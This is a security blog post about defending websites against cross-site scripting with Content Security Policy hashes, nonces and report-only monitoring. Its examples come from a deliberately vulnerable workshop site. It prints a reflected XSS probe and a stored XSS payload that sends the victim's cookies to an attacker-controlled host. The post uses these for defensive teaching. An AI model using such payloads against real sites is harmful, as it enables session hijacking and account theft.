I run a workshop titled Hack Yourself First in which people usually responsible for building web apps get to try their hand at breaking them. As it turns out, breaking websites is a heap of fun (with the obvious caveats) and people really get into the exercises. The first one that starts to push people into territory that's usually unfamiliar to builders is the module on XSS. In that module, we cover reflected XSS which relies on the premise of untrusted data in the request being reflected back in the response. For example, if we take the sample vulnerable site I use in the exercises and search for "foobar", we see the following:
You can see the search term - the untrusted data - in the URL: http://hackyourselffirst.troyhunt.com/Search?searchTerm=foobar
Then you can see it reflected in the page itself both in the search box and in the heading. The objective of this particular exercise is for the participants to steal the victim's auth cookie by constructing an XSS attack within the query string parameter. The first thing that everybody tries is something similar to this: http://hackyourselffirst.troyhunt.com/Search?searchTerm=<script>alert(0)</script>
That's pretty much XSS 101 - just get an alert box to fire - and reflecting a script tag is one of the most fundamental techniques attackers use to run their script on your website. Now in this particular case you'll note that this pattern gets rejected by the website because there's some very rudimentary filtering (the "<" character causes it to fail), but you can see what the attacker is trying to achieve here. I'll come back to this site a little later.
Let's move onto content security policies and per that link, I've been playing with CSPs for a couple of years now. My involvement has really ramped up in recent times though, especially with my announcement a couple of weeks ago about joining Report URI. This is the first of what will be many subsequent blog posts that talk about how browsers can defend against precisely the sort of attack I just demonstrated and how Report URI plays a role in giving you visibility into this style of attack.
By Default, Inline Scripts Are Out
Let's take a bare bones, fundamentally basic CSP which looks like this:
Content-Security-Policy: default-src 'self'
What this will do is only allow the browser to load content served from the same site as the page returning this header. No external videos embedded from YouTube, no JavaScript libraries off your favourite CDN and no analytics or tracking from Google. Also, no script blocks. None. Nada. What that means is that if we take a site like Have I Been Pwned (HIBP) and apply that CSP, this block in the source code simply won't run:
<script type="text/javascript">
(function (i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date(); a = s.createElement(o),
m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-45816011-1', 'haveibeenpwned.com');
ga('send', 'pageview');
</script>
It won't run because it could be malicious. Now you and I can look at this and recognise that it's simply Google Analytics' standard script, but how does the browser know that? I mean how can it make a judgement call between good script and bad script? It hasn't come in as untrusted data in the request so the browser's native XSS defence can't fire (incidentally, that feature is disabled on the Hack Yourself First site courtesy of the "X-XSS-Protection: 0" header), but there's more to XSS then just "reflected XSS" anyway. For example, try taking a look at the Bugatti Veyron page and you'll see what I mean. Miss it? That's because someone left a comment on that page which is literally this:
<script>location.href="http://attacker.hackyourselffirst.troyhunt.com/Cookies/?c="+encodeURIComponent(document.cookie);</script>
And now all your cookies for the site have been sent off to a totally different site. This is "persistent XSS" in that the attack is literally stored in the database. How on earth is the browser meant to know whether that script is there by design or has been embedded maliciously by an attacker? There's an easy answer - it simply can't tell the difference.
This is why a CSP turns off script blocks by default. This is an absolute polar opposite extreme to the way most websites today are running where they'll simply run any script without knowing whether it's meant to be there or not. In fact, we know empirically that it's 98% of the world's top 1 million websites that will do precisely this! So we have these two extremes which are to either run everything or run nothing. Let's talk about some middle ground.
Using Hashes
We'll begin by looking at the error I get in the console when that script block appears in HIBP with a bare bones CSP:
One of the first things you'll see there is that I can solve this problem using the "unsafe-inline" keyword. This completely disables the very defence we're talking about here and by doing this, any script can run. I show people this and they frequently respond with "Whoa - isn't that dangerous?!" The irony, of course, is that this is precisely where 98% of websites are today! But again, that's at one of the extreme ends of the scale and it's really not where we want to be so let's instead focus on the next piece of that error message which talks about a hash.
We can copy SHA-256 hash in that error message and change the CSP to do this:
Content-Security-Policy: default-src 'self'; script-src 'sha256-blLDIhKaPEZDhc4WD45BC7pZxW4WBRp7E5Ne1wC/vdw='
And that's it - problem solved! This works because the hash of the script block will always be the same on every load so what we're effectively doing is saying "we trust this script - this exact script - and it can always run but no others can". It's simply a white list and when the browser sees that original script block it'll hash it, compare it with the CSP and then run it if it matches. So that's that problem solved, let's move onto the next one.
Using Nonces
When I show the hash approach in my workshops, I often have people ask "but does this mean I need to recalculate the hash every single time I change the script?" Yes, it does, and I know that can get painful. It's not just the convenience factor either because there are occasions where a script block may actually be dynamic, for example on the Hack Yourself First site. Remember how when I searched for "foobar" we saw it both in the heading on the page and in the script block? Here's how it achieves the latter:
$('#searchTerm').val('foobar');
Yes, this is screwy, but welcome to the web! I see far worse on a near daily basis and arguably, there are multiple different circumstances in which you may genuinely need a script block that contains dynamic content that's potentially malicious. But that means you can't return a hash because you simply don't know what the script block will contain. Yes, you could build the whole thing up dynamically, calculate the hash then return that in the CSP and render the script block to the page but not only is that getting super messy, it doesn't help with the maintainability problem.
All of this brings us to the next feature mentioned in the original error and that's nonces. In case the term is unfamiliar, a nonce is a pseudo-random "number used once". In simple terms, rather than white listing a precise script block like the hash does, a nonce allows you to white list the entire script block regardless of what's in there. It consists of both a header and an attribute on the script tag and it looks just like this:
Content-Security-Policy: default-src 'self'; script-src 'nonce-4AEemGb0xJptoIGFP3Nd'
<script type="text/javascript" nonce="4AEemGb0xJptoIGFP3Nd">
Note that the value in the CSP matches precisely to the value in the attribute on the script tag. (Strictly speaking, the nonce isn't actually a number, it just needs to be base64 encoded.) This works because even if an attacker manages to inject their own script tag on the page and even add a nonce attribute, they won't know what the value in the header should be so they won't match and the browser won't run the script. It gives you more flexibility than with the hash but give this example on Hack Yourself First a go and you'll see how it also leaves you at risk if there's dynamic content in the script block.
So when you boil it all down, here's the evolution of how you can protect your users against potentially malicious scripts:
No CSP
Any inline script whatsoever can run
Nonce
Any script in a block with the nonce can run
Hash
Only the exact script in the hash can run
CSP default
No inline script whatsoever can run
Incidentally, in case you look at HIBP and wonder why the Google Analytics inline script is using a nonce and not a hash, it's because the library I use to generate the CSP doesn't currently support hashes. But there's no dynamic content in the script block that could be potentially manipulated anyway so in this case, it doesn't pose any risk.
Gotchas
By design, a CSP is meant to break things. No really, that's the entire value proposition! Its very purpose is to block content which hasn't explicitly been white listed either by a host name, nonce or hash. If you screw up your CSP, things will break which is why it's essential that you actually log reports using a service like Report URI.
But stuff can also break without you doing anything wrong. For example, whilst writing this post I rebuilt a lot of the CSP for HIBP because I wanted to clean a few things up. I put it out there in "report-only" mode and monitored things for a few days which meant I'd get the violation reports but nothing would break. And then I saw this:
Can anyone see why Edge is rejecting jQuery on this page even though there's a valid CSP nonce? It's happy in Chrome and FF, what's upsetting Edge? /cc @Scott_Helme https://t.co/N3wsJa26Gm
— Troy Hunt (@troyhunt) November 12, 2017
It turns out that there's a bug in Edge which causes it to ignore non-inline script nonces. Confused by what that means? Well you know how I used a nonce above to trust a script block? Well you can do the same thing to trust and external script by doing something like this:
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js" nonce="ZTIwNzkzNDUtOGQxNS00MzQ1LWJlNDYtMjhjODgwMWY5MDJk"></script>
Except you can't because Edge doesn't like it! However, you can use a host-based white list so what that means is that if you want the content to load in Edge then you need to add cdnjs.cloudflare.com as an allowable script-src. Of course, once you do that then you no longer need the nonce in the script tag above so that can go.
This is screwy and Microsoft needs to fix it, but they by no means have a monopoly on screwy CSP things either. Last year I wrote about how Chrome's buggy CSP cost me money and the year before that how I broke a part of my site far Safari users. And all of this leads me to the one very obvious observation:
ALWAYS MONITOR YOUR CSP REPORTS AND "TEST IN PRODUCTION" WITH REPORT-ONLY BEFORE ENFORCING THEM!!!
Yes, that's a bit shouty and yes, it plays directly into the service that Scott and I run but that's a large part of why I'm involved with it in the first place because it's just such an essential part of rolling out a CSP. You'll see that HIBP is now enforcing the CSP so I'm getting all the benefits it has to offer, but I'm only enforcing now because I ran the report-only version long enough to be confident that I was no longer getting any reports that required action on my behalf.
Mind you, I'm still seeing reports for things that aren't my fault and are related to factors beyond my control. They're actually benign reports, but I'll save that for another blog post where I'll talk about just how messed up some people's browsers are!
Article Link: Troy Hunt: Locking Down Your Website Scripts with CSP, Hashes, Nonces and Report URI